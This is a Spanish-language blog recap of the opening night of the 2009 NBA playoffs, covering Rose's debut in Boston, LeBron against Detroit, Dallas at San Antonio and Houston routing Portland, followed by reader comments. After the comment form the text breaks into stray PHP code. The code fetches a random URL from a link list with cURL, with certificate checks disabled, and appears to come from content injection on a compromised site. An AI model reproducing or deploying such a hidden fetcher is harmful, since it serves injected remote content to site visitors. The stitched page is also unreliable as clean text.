Playoffs (18/04/2009): Comienza el festival

19 de April de 2009 por TheDeerHunter

Empezamos fuertes. Primera jornada de la postemporada y tres ventajas campo por el aire a las primeras de cambio.

Cronológicamente, la primera gran noticia fue la victoria de los Bulls en Boston. Nunca antes, ni con Jordan a la cabeza, “los toritos” habían ganado un solo partido de playoffs allí. Pero era una noche propicia para reescribir la historia.

La noche en que Derrick Rose igualó los números de un tal Lew Alcindor (después conocido como Kareem Abdul Jabbar) como la mayor anotación de un rookie en su debut en las eliminatorias. Pero más allá de la anécdota estadística, el partido del rookie fue mágico. Bajo una asfixiante defensa de Rajon Rondo, su dirección fue perfecta, tomando en cada momento la decisión que había que tomar… y como colofón anotando tiros libres decisivos, como dando un carpetazo a sus errores en la final de la NCAA el año pasado.

En los Celtics, la baja de Garnett no debería explicar el horripilante partido de Ray Allen, Paul Pierce, ni el correctivo en los tableros que recibieron por parte de Noah y Miller (29 rebotes entre los dos). Si esto fuera una serie de 5 partidos la cosa estaría muy para ellos pero, con todo, al final perdieron por dos puntos en la prórroga con la victoria en su mano. Todavía queda demasiada tela por cortar.

No hubo lugar a la sorpresa en el Detroit @ Cleveland. Lebron masacrando y apenas ningún Piston respondiendo.
Él sabía cómo hacer daño a los mejores Pistons, cuanto más a éstos que prácticamente se arrastran por la pista. Poco o nada podemos salvar de ese equipo desdibujado, apenas reconocemos a algún jugador. Mucho tendrán que mejorar para ganar algún partido o mucho tendrán que relajarse los Cavs. De momento no parece que vaya a suceder ni una cosa ni la otra.

Sí hubo partido, y de los buenos, en el AT&T Center de San Antonio, en el derbi contra Dallas. Ni se sabe la cantidad de partidos que los Spurs han sacado adelante con el único concurso de Parker&Duncan. Anoche lo intaron por ese camino, pero esta vez no fue suficiente. Espectacular el estado de forma con el que ha llegado Josh Howard a este momento. Quizás debería plantearse lesionarse todos los años durante gran parte de la temporada. Resulta representativo del momento que están atravesando los Mavericks.

No necesitamos ver al mejor Nowitzki para llevarse el gato al agua. Sí vimos a un gran Dampier motivadísimo en su defensa sobre Duncan, un eficaz Kidd forzando lo mínimo posible contra Parker y, sobre todo, un banquillo con Terry, Bass y Barea que marcó la diferencia frente al solar de los locales.

Finalmente, a los Blazers se les apagaron las luces en su debut contra los Rockets. Amarga novatada la que sufrieron, con un lanzamiento exterior terrorífico, que permitió a los visitantes cerrarse más todavía y morder a base de bien. Defensa dura y contraataque. Brooks lanzándolos como un demonio ¿no te gusta el ritmo lento, McMillan? Pues dos tazas. Pocos esperábamos un palizón de estas características a las primeras de cambio aunque es algo que le puede pasar a un equipo inexperto como el de los Blazers. Ahora la cosa se les complica más si cabe. Tendrán que luchar contra dos enemigos. Los rocosos Rockets y su propia ansiedad. Seguro que Adelman intentará explotarla.

PREMIOS TJNBA:

MVP: The King James, haciendo ya tradicional sus palizas a los Pistons. 38 puntos, 8 rebotes, 7 asistencias. Lejos queda la época en la que Tayshaun Prince anulaba a las estrellas rivales.

Rookie: Si no tenía todavía claro su premio, que le vaya haciendo hueco en la estantería. Derrick Rose completó anoche una actuación histórica con méritos de MVP. 36 puntos y 11 asistencias para el crack de Illinois.

La sorpresa: Dos no habituales líderes en sus equipos. Josh Howard por los Mavericks y Aaron Brooks por los Rockets. Anoche sí lo fueron.

La decepción: Por un lado, el partido de la vieja guardia de Detroit, personalizada en Prince. 4 puntos 1 rebote 2 asistencias en 38 minutos de juego. Por el otro, la bajada a los infiernos de todo el equipo de los Blazers. Rudy sólo lanzó 3 veces a canasta… y el porcentaje de triples de todos el equipo no alcanzó ni el 10%. Así es complicado abrir el cerrojo de los Rockets.

El mayor esfuerzo en vano: Discutíamos sobre él hace no mucho. Unos se llevan la fama y otros cardan la lana. El único que plantó cara en los actuales campeones fue Rajon Rondo… que a punto estuvo él sólo de ganar el partido… y a su alrededor cualquier cosa menos ningún “big three”.

RAZONES PARA TRASNOCHAR:

Si no las encontráis esta noche es que no os gusta el baloncesto.

El menú incluye: Lakers-Jazz a las 21h de la noche!!!; Sixers @ Orlando a las 23:30h; Heat @ Atlanta a las 2h y Hornets @ Denver a las 4:30h… Y si queréis podéis hacer scouting a jugadores como Kobe, Wade, Dwight Howard o Chris Paul, ahí es nada…

A disfrutar…

Comenta

8 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Bueno como empieza esto!!!!

    Cualquier calificativo que se me ocurre para la actuación de Rose se queda corto. Rondo ni le vió y por mucho que digan los números el si defendió bien al de Boston. También destacar la defensa de Gordon sobre Ray Allen durante todo el partido sin dejarle tirar casi ningun tiro cómodo y a la vez machacando a los Celtics en el último cuarto como en el es habitual.

    Por Boston el que estuvo menos mal fue Rondo, que conste que no le tengo manía ni nada parecido pero para mi no jugó bien, acelerado por momentos y sin llevar bien el ritmo del partido que es una de sus virtudes.

    El Blazers-Rockets palizón tremendo. Inteligentísimo el juego de los Rockets que durante el primer cuarto buscaron exclusivamente canastas de alto porcentaje y así acabó Yao ese periodo con 14 puntos sin fallo. Los Blazers jugaron fatal y Lamarcus no pudo con Scola en ningun momento, nadie jugó bien en los de McMillan, para mi el mejor Oden al cual le dan poquísima bola y puede ser una de las claves para forzar a Yao en defensa.

      Citar

  2. Fran Reyes dice:
    #2

    Sorprendente jugada la de ayer. Sobre todo por el chorreo de Houston a Portland. Hablé con un amigo y ambos coincidimos en que McMillan tenía que aprovechar muchísimo el juego exterior, que en el duelo Ming-Scola vs Pryzbilla-Aldrige no había nada que hacer. Efectivamente, ayer 17-8 en rebotes a favor de los de Houston. Y en los triples… 1/11 para Portland. Es lo malo de confiar en el tiro exterior, que es lo más parecido a tirara la moneda al aire que hay.

    La gran diferencia entre Chicago y Boston estuvo, viendo las estadísticas, bajo los tableros. Que tu máximo reboteador sea el base… Por otra parte, me llama la atención que Mikki Moore sólo jugara 5:30 habiendo cogido durante ese período de tiempo 4 rebotes, lo cual por sí solo indica un buen desempeño. Boston es muy diferente de tener a Garnett a no tenerlo; pero hay más problemas, como por ejemplo que Allen se quede en 4 puntos con 1/12 en tiros de campo. Tarde aciaga…

    Para hoy, pues la verdad es que no parece que haya margen para la sorpresa en los partidos de Lakers y Magic. En Denver, puede que los Nuggets estén poco inspirados y CP3 mucho. Y el Miami-Atlanta… pues va a ser un combate, un duelo. El más bonito a priori.

      Citar

  3. Jabho dice:
    #3

    Pues si, partido horrible de Boston, horrible Ray, mal en el rebote, gris Pierce, tremendos Rose y Gordon…

    Derrota en la prórroga que pudo haber evitado Pierce anotando el 2 tiro libre e incluso hubo jugadas para ganar en el tiempo extra…

    Sigo apostando por Boston.

    Por otra parte Viva creo que un partido tan igualado lo resumes en que los verdes muy mal y los rojos no tienes palabras… Jejeje no será para tanto ¿no?

    Quitando Cavs creo que queda mucho en las otras

    A ver que tal se da la noche hoy

      Citar

  4. kantonyo dice:
    #4

    Yo creo que Rondo estuvo bastante bien, aunque defraudó en su defensa a Rose, pero los que estuvieron bastante mal fueron Pierce y Allen. El año pasado tambien estuvieron bastante mal en las primeras rondas, pero claro este año no tienen a Garnett, y eso se ha notado bastante.

    El segundo partido nos dejará ver que tal entrenador es Doc Rivers, el año pasado lo tuvo todo a su favor, veremos como afronta el partido, y si es capaz de poner freno a Gordon y Rose de alguna manera. No me estrañaría que hubiera otro “Cid Campeador” este año y volviera Garnett.

    ……………………………………….

    Yo le tenia mucho miedo a Houston, y sobre todo a Yao Ming, los partidos que he visto este año de Blazers contra Houston, me habian dejado claro que no había recursos para frenarle. Ayer Oden fue el mejor, pero cuando Ming no estaba, un duelo entre los dos ahora no tiene color. La otra clave de ayer sobre todo estuvo en Artest y Scola, su experiencia y oficio dejó en evidencia al talento de Portland.

    No es por ponerme en plan “Marca”, pero creo que Portland necesita a Rudy de titular, jugando 30-35 minutos y teniendo más protagonismo, al igual que creo que Sergio no está para los playoffs, contra Houston se necesita caracter y él no lo tiene.

    Mi peor sensación para los próximos partidos fue ver a Brandon Roy, ayer jugo para el solo y volvió a olvidarse de Rudy, parece que no quiere que el español le robe protagonismo en los playoffs y eso lo pagará seguro Blazers…

      Citar

  5. Viru dice:
    #5

    Pues sí. Roy muy egoista, y a Oden le llegaron pocos balones cuando estuvo el tío muy solvente. Horrorosos los Blazers. La primera mitad de Yao increíble, y encima pudo descansar práciticamente todo el segundo tiempo.

    En cuanto a los Celtics, pues no sabe uno que pensar. Jugando así de mal y a punto estuviron de llevárselo… A ver que pasa.

      Citar

  6. Txusma dice:
    #6

    Como dice la cronica: nunca los Bulls habian ganado en el pabellon de los Celtics. Y aunq los Celtics no jugaran un gran partido ganar alli tiene un merito tremendo. No creo q a los Celtics les valga aquello de “jugando mal estuvimos a punto de ganar” y si les vale, entonces apuesto por victoria segura de Chicago. Y añado q empiezo a dudar q a Ray Allen haya q considerarlo un “Big Three”. Seguro q aun ganara mas partidos con canastas finales pero durante el desarrollo del mismo su juego hace mucho q bajo de nivel…

    Y la victoria de los Mavs tb es digna de mencion. Ha llegado un momento q la formula Parker&Duncan no funciona.

      Citar

  7. Jabho dice:
    #7

    Sobre Ray Allen ha hecho una temporada muy buena. Algo más lejos, en las finales del año pasado estuvo soberbio tanto en defensa como en ataque, aunque es cierto que no estuvo a ese nivel todos los PO.

    No se trata de que valga o no valga. Por supuesto tiene merito ese triunfo de los Bulls, pero si todos los calificativos de los Bulls son extraordinarios y los Celtics horribles y la distancia es tan poca…

    Sigo apostando por los verdes aunque los Bulls son desde hace un tiempo un regalo envenenado para el 2º…

    Sobre los Mavs es similar a los Bulls, acabaron el año en gran forma y la baja de Manu limita a los SPurs no tanto para pasar una o dos rondas, sino para ganar el anillo

      Citar

  8. Txusma dice:
    #8

    Hay 2 factores positivos verdes del partido: uno la actuacion de Rondo sobretodo a nivel individual pq en defensa fue superado por Rose una y otra vez y dos, y mas importante, el impresionante ambiente del pabellon. En la ecuacion “pero si todos los calificativos de los Bulls son extraordinarios y los Celtics horribles y la distancia es tan poca” parece que se os olvida siempre que el partido se jugo en Boston. Si se hubiera jugada en Chicago, con ambiente hostil para los Celtics, estaria de acuerdo contigo pero jugandose alli…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>